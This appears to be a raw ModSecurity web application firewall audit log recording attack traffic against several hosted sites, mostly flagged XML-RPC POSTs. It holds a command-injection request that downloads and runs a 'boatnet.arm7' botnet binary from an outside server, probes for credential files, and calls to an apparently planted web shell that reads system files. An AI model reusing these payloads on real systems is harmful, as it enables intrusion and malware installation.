yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=de71127ce0d15a26fe8270493e9893dd%7C%7C1750162397%7C%7C1750158797%7C%7C52c01a886c7fdca7aa1aad9c3ae92236 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --000b341f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=ho8ojin6ijnb75dirbb4uhqfm7; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ed32e7ea2c91befc2bcbc9408964a4%7C%7C1750162398%7C%7C1750158798%7C%7Ca6affc2127718425c4ff94725e462a22; expires=Tue, 17 Jun 2025 12:13:18 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=94ab52eb4b95bb5fcacef273a3c4fd48%7C%7C1750162399%7C%7C1750158799%7C%7C00a78f3febd7fb66bd0e641c8f879f54; expires=Tue, 17 Jun 2025 12:13:19 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --000b341f-E-- --000b341f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE643l97WYuiWZZK24X9BAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989598083510 1046206 (- - -) Stopwatch2: 1749989598083510 1046206; combined=2793, p1=382, p2=2027, p3=93, p4=39, p5=156, sr=95, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --000b341f-Z-- --49d08f15-A-- [15/Jun/2025:17:44:19.291218 +0530] aE65GlirsA1ruSKrNWSZjgAAAAQ 165.22.247.248 36352 127.0.0.1 7081 --49d08f15-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=20140sd06bn040q6ku5s85arqf; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_79b01a9a1340fc3bcbf8ed61df5df3%7C%7C1750162457%7C%7C1750158857%7C%7C6454a5d6d0e423586cc42a0b659becd3; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8588c98d826b56c3ddc066036fa14446%7C%7C1750162458%7C%7C1750158858%7C%7C51792d42bc02e6d8431eec03ee42d054 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --49d08f15-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=805kn7r67brs6mp5fe77a3jhgh; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_37ab37f07bf870cb2740d9cbd1cb4f%7C%7C1750162459%7C%7C1750158859%7C%7C2556540a3c0a6fc773e4257c465fb586; expires=Tue, 17 Jun 2025 12:14:19 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=02274411f765a5a2efb764d6ec2dde15%7C%7C1750162459%7C%7C1750158859%7C%7C4594285907a7eb2f8e801ec07092d00f; expires=Tue, 17 Jun 2025 12:14:19 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --49d08f15-E-- --49d08f15-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE65GlirsA1ruSKrNWSZjgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989658252756 1038544 (- - -) Stopwatch2: 1749989658252756 1038544; combined=3314, p1=423, p2=2440, p3=97, p4=37, p5=191, sr=111, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49d08f15-Z-- --5881f17e-A-- [15/Jun/2025:17:45:19.667446 +0530] aE65Vl97WYuiWZZK24X9TAAAAAI 165.22.247.248 40814 127.0.0.1 7081 --5881f17e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=16o9ds8kvtg19c9fmpq5hgkad4; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c6a7b24f0201381a03e0b2402d4651%7C%7C1750162518%7C%7C1750158918%7C%7C9072cfac13d08286ea420722902be793; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=36d3744bdbbec0e366f6c9fce8ae71cf%7C%7C1750162518%7C%7C1750158918%7C%7C0ff8a3f5f0d2af2c4494bbd3910c4be9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5881f17e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=82719sj4e4sdm8knnqsgemjnq1; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7eaa2fe3083513420caadd049a2fa9%7C%7C1750162519%7C%7C1750158919%7C%7C79a57b40a7258c4f8a54c252bb7e357b; expires=Tue, 17 Jun 2025 12:15:19 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e85cd3a2709b065df03854e70e83af69%7C%7C1750162519%7C%7C1750158919%7C%7Ca4dd3e602f10c3ac1d10c5f5012ca388; expires=Tue, 17 Jun 2025 12:15:19 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5881f17e-E-- --5881f17e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE65Vl97WYuiWZZK24X9TAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989718647260 1020274 (- - -) Stopwatch2: 1749989718647260 1020274; combined=2781, p1=373, p2=2020, p3=102, p4=36, p5=160, sr=94, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5881f17e-Z-- --31cf141c-A-- [15/Jun/2025:17:46:19.593699 +0530] aE65kl97WYuiWZZK24X9YgAAAAI 165.22.247.248 54816 127.0.0.1 7081 --31cf141c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 Cookie: PHPSESSID=ij7iascg746iig9rrjrhbcl2ol; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4a116fac2d10b0f4162bbb51df2d06%7C%7C1750162578%7C%7C1750158978%7C%7C6c5b5d6367232e978175b28ae3398546; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1d9db6261111bf41fcc549a72cc5bad5%7C%7C1750162578%7C%7C1750158978%7C%7C757ba49e497976b5fb3be09aa16f856f User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --31cf141c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=khhj1d6092hllcedjapvruk4de; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b29e34dc8ca209313e7e24acf7baa1%7C%7C1750162579%7C%7C1750158979%7C%7C9be7bab13a36ef71563e169483a04789; expires=Tue, 17 Jun 2025 12:16:19 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=391aba6a6ebe156778870c4864499437%7C%7C1750162579%7C%7C1750158979%7C%7C1601c22890f022358f07bfad449bf7c1; expires=Tue, 17 Jun 2025 12:16:19 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --31cf141c-E-- --31cf141c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE65kl97WYuiWZZK24X9YgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989778577269 1016520 (- - -) Stopwatch2: 1749989778577269 1016520; combined=3173, p1=494, p2=2196, p3=127, p4=43, p5=194, sr=110, sw=119, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --31cf141c-Z-- --8c6da338-A-- [15/Jun/2025:17:56:04.538062 +0530] aE673AG_OhOIIVz6TXRlMgAAAAA 144.172.116.95 46556 127.0.0.1 7080 --8c6da338-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 144.172.116.95 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 Cookie: uid=1 --8c6da338-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c6da338-E-- --8c6da338-H-- Message: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/modsecurity.d/rules/comodo_free/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||198.71.51.75|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] [hostname "198.71.51.75"] [uri "/device.rsp"] [unique_id "aE673AG_OhOIIVz6TXRlMgAAAAA"] Stopwatch: 1749990364533102 5032 (- - -) Stopwatch2: 1749990364533102 5032; combined=3701, p1=519, p2=3064, p3=31, p4=27, p5=59, sr=120, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c6da338-Z-- --72f93c4b-A-- [15/Jun/2025:18:08:37.034826 +0530] aE6-y1u1-lKBbvo2E9pItwAAAAw 13.39.16.88 42316 127.0.0.1 7081 --72f93c4b-B-- GET /sftp-config.json HTTP/1.0 Host: www.thecreatorpreneur.in X-Real-IP: 13.39.16.88 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --72f93c4b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 15780 Connection: close Content-Type: text/html; charset=UTF-8 --72f93c4b-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.thecreatorpreneur.in"] [uri "/sftp-config.json"] [unique_id "aE6-y1u1-lKBbvo2E9pItwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749991115446997 1587910 (- - -) Stopwatch2: 1749991115446997 1587910; combined=1936, p1=401, p2=1441, p3=0, p4=0, p5=93, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72f93c4b-Z-- --f484d835-A-- [15/Jun/2025:18:17:16.199069 +0530] aE7A1FirsA1ruSKrNWSdNgAAAAQ 3.210.29.96 49504 127.0.0.1 7081 --f484d835-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/nginx&viewfile=//etc/nginx/nginx.conf.default HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.210.29.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f484d835-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3406 Connection: close Content-Type: text/html; charset=UTF-8 --f484d835-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /etc/nginx/nginx.conf.default"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7A1FirsA1ruSKrNWSdNgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991636194530 4591 (- - -) Stopwatch2: 1749991636194530 4591; combined=2413, p1=369, p2=1887, p3=63, p4=41, p5=53, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f484d835-Z-- --129e270f-A-- [15/Jun/2025:18:17:52.086033 +0530] aE7A-K0DL6wP6GYrtq9hMAAAAAY 3.210.29.96 34620 127.0.0.1 7081 --129e270f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/console-setup.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.210.29.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --129e270f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3397 Connection: close Content-Type: text/html; charset=UTF-8 --129e270f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/console-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7A-K0DL6wP6GYrtq9hMAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/console-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7A-K0DL6wP6GYrtq9hMAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991672081641 4445 (- - -) Stopwatch2: 1749991672081641 4445; combined=2512, p1=349, p2=1983, p3=40, p4=49, p5=90, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --129e270f-Z-- --c9b3186d-A-- [15/Jun/2025:18:18:08.156855 +0530] aE7BCAA7noq-Jjeat46yRgAAAAI 52.70.209.13 57894 127.0.0.1 7081 --c9b3186d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/mariadb HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.70.209.13 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c9b3186d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5754 Connection: close Content-Type: text/html; charset=UTF-8 --c9b3186d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BCAA7noq-Jjeat46yRgAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/mariadb"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BCAA7noq-Jjeat46yRgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991688152101 4805 (- - -) Stopwatch2: 1749991688152101 4805; combined=2461, p1=393, p2=1910, p3=38, p4=35, p5=85, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c9b3186d-Z-- --c2ea4160-A-- [15/Jun/2025:18:18:17.064141 +0530] aE7BEe1dBH7kBIRWBpH98gAAAAk 3.225.45.252 36544 127.0.0.1 7081 --c2ea4160-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/plymouth-log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.225.45.252 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c2ea4160-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3371 Connection: close Content-Type: text/html; charset=UTF-8 --c2ea4160-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/plymouth-log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BEe1dBH7kBIRWBpH98gAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/plymouth-log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BEe1dBH7kBIRWBpH98gAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991697059766 4428 (- - -) Stopwatch2: 1749991697059766 4428; combined=2319, p1=341, p2=1813, p3=36, p4=36, p5=93, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c2ea4160-Z-- --19655e77-A-- [15/Jun/2025:18:18:35.637900 +0530] aE7BI3rzia-Xuz8LZxRSOgAAAAg 100.29.107.38 40304 